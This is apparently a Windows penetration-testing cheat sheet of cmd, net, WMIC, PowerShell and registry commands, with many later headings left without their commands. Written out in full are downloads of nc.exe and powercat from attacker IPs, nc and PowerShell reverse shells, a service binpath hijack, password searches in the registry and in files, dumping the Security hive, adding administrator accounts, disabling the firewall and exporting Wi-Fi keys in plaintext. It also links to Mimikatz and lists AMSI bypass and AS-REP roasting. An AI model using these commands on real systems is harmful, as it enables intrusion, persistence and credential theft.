Windows
Versions
NT 3.1
Windows NT 3.1 (All)
NT 3.5
Windows NT 3.5 (All)
NT 3.51
Windows NT 3.51 (All)
NT 4.0
Windows NT 4.0 (All)
NT 5.0
Windows 2000 (All)
NT 5.1
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2
Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server
NT 6.0
Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard)
Files
Command
Explanation
%SYSTEMROOT%
Usually C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts
Static hostname-to-IP mappings (hosts file)
%SYSTEMROOT%\System32\drivers\etc\networks
Network name-to-number mappings
%SYSTEMROOT%\System32\config\SAM
Local account names and password hashes (SAM database)
%SYSTEMROOT%\repair\SAM
Copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt
Application event log
%WINDIR%\system32\config\SecEvent.Evt
Security event log
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup folder (all users)
%USERPROFILE%\Start Menu\Programs\Startup\
Startup folder (current user)
%SYSTEMROOT%\Prefetch
Prefetch folder (records of executed programs)
Startup paths
For Windows NT 6.1, 6.0
For Windows NT 5.2, 5.1, 5.0
For Windows 9x
For Windows NT 4.0, 3.51, 3.50
System information commands
Command
Explanation
ver
Operating system version
sc query state= all
Show services
tasklist /svc
Show process and services
tasklist /m
Show all processes and DLLs
tasklist /S ip /v
Processes running on the remote host ip
taskkill /PID pid /F
Force-kill the process with the given PID
systeminfo /S ip /U domain\user /P Pwd
Get system information from a remote host
reg query \\ip\RegDomain\Key /v VALUE
Query the registry of a remote host (/s = all values)
reg query HKLM /f password /t REG_SZ /s
Registry search for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
WSUS address
fsutil fsinfo drives
List of drives (needs admin access)
dir /a /s /b c:\*.pdf
Find all PDF files
dir /a /b c:\windows\kb*
Search for patches
findstr /si password *.txt *.xml *.xls
Search files for passwords
tree /F /A c: > tree.txt
Write the folder tree of drive C: to tree.txt
reg save HKLM\Security security.hive
Save the Security hive to a file
echo %USERNAME%
Current user
whoami /priv
Current user permissions
Net/domain commands
net view /domain
Hosts in the current domain
net view /domain:[MYDOMAIN]
hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add user
net localgroup "Administrators" user /add
Add user to Administrators
net accounts /domain
Domain password policies
net localgroup "Administrators"
List of Local Admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of Admin users in the domain
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB shares
net session | find "\\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Activate (unlock) a domain user account
net user user "newpassword" /domain
Change a domain user's password
net share share c:\share /GRANT:Everyone,FULL
Share a folder with full access for Everyone
Remote commands
tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
System information of ip
net share \\ip
Shares on ip
net use \\ip
File system of ip
net use z: \\ip\share password /user:DOMAIN\user
Map a drive with the specified credentials
reg add \\ip\regkey\value
Add a registry key on ip
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto
Create a remote service (note the space after binpath= and start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:\windows\temp\nc.exe
Download a file from ip to the current system via cmd.exe
cmd.exe /c c:\windows\temp\nc.exe ip port -e cmd.exe
Reverse shell
nc.exe -lvvp port
Listen on the given port
python3 -m http.server port
Start a simple web server (Python 3)
xcopy /s \\ip\dir C:\local
Copy a folder from ip
shutdown /m \\ip /r /t 0 /f
Force-restart the system ip immediately
Network commands
ipconfig /all
ip settings
ipconfig /displaydns
DNS cache
netstat -ana
Show connections
netstat -anop tcp 1
Netstat loop (refresh every second)
netstat -an | findstr LISTENING
Ports in use
route print
Route tables
arp -a
Show MAC addresses from the ARP table
nslookup, set type=any, ls -d domain > results.txt, exit
DNS zone transfer
nslookup -type=SRV _www._tcp.url.com
Get Domain SRV lookup (ldap, kerberos, sip)
tftp -I ip GET remotefile
File transfer over TFTP
netsh wlan show profiles
Stored wireless profiles
netsh firewall set opmode disable
Disable firewall (old syntax)
netsh wlan export profile folder=. key=clear
Export Wi-Fi profiles with keys in plaintext
netsh interface ip show interfaces
List interface IDs and MTUs
netsh interface ip set address local static ip nmask gw ID
Set a static IP
netsh interface ip set dns local static ip
DNS server configuration
netsh interface ip set address local dhcp
Set interface to use DHCP
Functional commands
type file
Show file contents
del path\*.* /a /s /q /f
Delete all files under the given path
find /I "str" filename
Case-insensitive search for str in filename
command | find /c /v ""
Count the lines of a command's output
at HH:MM file [args] (i.e. at 14:45 cmd /c)
Schedule file execution
runas /user:user "file [args]"
Execute file with specific user
shutdown /r /t 0
Restart
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Starting the UsoSvc service
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change the binary path of the UsoSvc service
tr -d '\15\32' < win.txt > unix.txt
Remove CR and ^Z characters (*nix)
makecab file
Compression
wusa.exe /uninstall /kb:###
Uninstall a patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
Query the event log from the command line
lusrmgr.msc
Using Local user manager
services.msc
Using Services control panel
taskmgr.exe
Using Task manager
secpol.msc
Using Security policy manager
eventvwr.msc
Using Event viewer
Misc. commands
Locking the workstation
Disable Windows Firewall
Create port forward (*need admin access)
enable cmd
PSEXEC command
Remote file execution with specific identity information
Execution of command with special hash
Run the command on the remote system
Terminal service (RDP)
Start RDP
RDP tunnel from port 443 (need to restart the terminal service)
Remove network authentication by adding an exception in the firewall
Import task from XML file
WMIC commands
wmic [alias] get /?
List all properties of the alias
wmic [alias] call /?
List callable methods of the alias
wmic process list full
process properties
wmic startup list full
Startup program properties
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wmic process call create "process_name"
Run process
wmic process where name="process" call terminate
Terminate process
wmic logicaldisk get description,name
Display logical drives
wmic cpu get DataWidth /format:list
Show whether the system is 32-bit or 64-bit
wmic service where started=true get name, startname
Show running services
WMIC [alias] [where] [clause]
Run the file in smb with specific identity information
Remove the software
Remote user access
Show processes in real time
Start RDP
List of times the user has logged in
Search services for unquoted paths
Volume shadow copy
PowerShell commands
Command
Description
stop-transcript
Stop recording
get-content file
Display the contents of the file
get-help command -examples
Show example usage of a command
get-command *string*
Search for cmd
get-service
Show services (stopservice, start-service)
get-wmiobject -class win32_service
Show services with the same identity information
$PSVersionTable
Show PowerShell version
powershell.exe -version 2.0
Run powershell 2.0 from version 3.0
get-service | measure-object
Count the returned services
get-psdrive
List PSDrives
get-process | select -expandproperty name
Show process names
get-help * -parameter credential
Commands that accept a credential parameter
get-wmiobject -list *network*
Available network-related WMI classes
[Net.DNS]::GetHostEntry("ip")
DNS lookup
powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe"
Download and save the file
powershell.exe -c "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10:8000/powercat.ps1'); powercat -c 10.10.10.100 -p 4444 -e cmd"
Reverse shell
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1
Web server with port 8050
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Use mimikatz
call ps1 files
Import-Module .\Invoke-Mimikatz.ps1
iwr -uri http://10.10.10.10/file -o file.exe
Download and save the file
Bypass AMSI
Or
Disable realtimemonitoring
List of all users
List of all domains
Get AD credentials using donotrequirepreauth
Deleting security reports and programs (for SVR01)
Extract the version of the operating system inside the CSV file
List of running services
Using ps drive for permanent sharing
Files written on 8/20
Get file from http
tcp port connections (scanner)
Ping command with 500 millisecond timeout
Basic authentication window
Run the exe file (from cmd.exe) every 4 hours between August 8 and 11, 2013, from 0800 to 1700
Run Powershell as
Upload with powershell
Email sender
Activating remote access to powershell (requires identity information)
hostname and ip list for all domains
Download from Powershell from specific path
Display Powershell data
Using powershell to run meterpreter from memory
in the attacking system
Start the listener in the attacking system
On the target system (run powershell(x86))
Encodemeterpreter.ps1 [7]
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using powershell to start meterpreter (second method)
On bt attack box
in the attacking system
Start the listener in the attacking system
In the target system (1: download the shell code, 2: execute)
Identification of vulnerable domains with powerup
Windows registry
operating system information
Product Name
Installation Date
registered name
System boot information
Time zone information (in minutes from UTC)
Mapped network drives
Mounted devices
usb devices
Activation of IP forwarding
Password keys: LSA secrets can contain VPN, autologon and other passwords
Audit policy information
Kernel and user services
software installed in the system
Installed software for the user
Latest documents
Last locations used by the user
URLs typed
MRU lists
The last registry key used
Startup paths
Activation of Remote Desktop
Get Windows information with dsquery
List of domain users
List of domain groups domain=victim.com
List of domain administrators
List of user groups
Get the entered user id
List of users who have not been active in the last two weeks
Add user
Delete user
List of domain operating systems
List of site names
List of all subnets in the site
List of services in the site
Get domain servers
DC list of the site
Script writing
In batch scripts, loop variables must be written with a double percent sign, for example %%i
Create ping sweep
Create a loop inside the file
domain brute forcer operation
account closing(lockout.bat)
DHCP exhaustion operation
DNS reverse lookup process
Search all the paths to find the files that contain PASS and display the details of that file
Malicious domain simulation (Application for IDS test)
Operation of IE web looper (traffic generator)
Get access to executive services
Spinning Reboot (replace /R with /S to shutdown):
Create a shell using vbs (requires identity information)
Scheduling the task
Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access
Always schedule task [10]
Instructions for working with smb
Log in with a specific user
Login without password
Change password
Show shared route
Show the specified route
Login to Shell
Get users along with password hash
SMB password guessing
with metasploit
with medusa
rpcclient commands
Log in
Show user information
Show users
Show permissions
Change user access
Show printers
NTLM extraction from ntds.dit file
Gather information using SharpHound
Gather information about Sql Server
Obtain AS-REP Roast hash
List of available ips without using nmap
Or
Service identification with Test-WSMan
Enumerate OUs
Retrieve users in the 'ICS' OU
SharpHound Collect
Impersonate Token of nuclear\vdadmin (on psexec session)